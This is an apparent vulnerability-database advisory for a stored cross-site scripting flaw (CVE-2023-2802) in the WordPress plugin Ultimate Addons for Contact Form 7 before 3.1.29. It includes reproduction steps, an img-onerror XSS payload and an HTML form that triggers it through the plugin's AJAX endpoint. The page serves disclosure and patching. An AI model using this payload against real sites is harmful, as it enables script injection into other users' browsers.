Lucene search
Alex SanfordWPEX-ID:C5CC136A-2FA6-44FF-B5B5-26D367937DF9HistoryJul 24, 2023 - 12:00 a.m.
Ultimate Addons for Contact Form 7 < 3.1.29 - Admin+ Stored XSS
2023-07-2400:00:00
Alex Sanford
61
contact form 7
ultimate addons
plugin
stored xss
admin
security
exploit
0.0004 Low
EPSS
Percentile
14.2%
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
1. Ensure Contact Form 7 is installed, along with this plugin
2. Visit Contact > Ultimate Addons, ensure "Pre-populate Field" is checked, and click Save.
3. Visit Contact > Contact Forms and click "Edit" for a form.
4. Click the button "UACF7 pre-populate Fields".
5. In the "Redirect URL" field enter `<img src=x onerror=alert(document.domain)>`.
6. Click the "Add Field" button to ensure at least one field is added, and click "Save".
7. Submit the following form in another tab and see the alert trigger:
<html>
<body>
<form action="https://WORDPRESS_URL/wp-admin/admin-ajax.php?action=uacf7_ajax_pre_populate_redirect" method="POST">
<input type="hidden" name="form_id" value='43' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
prion
prion
Cross site scripting
2023-08-14 20:15:00
cvelist
cvelist
nvd
nvd
CVE-2023-2802
2023-08-14 20:15:11
cve
cve
CVE-2023-2802
2023-08-14 20:15:11
wpvulndb
wpvulndb
Ultimate Addons for Contact Form 7 < 3.1.29 - Admin+ Stored XSS
2023-07-24 00:00:00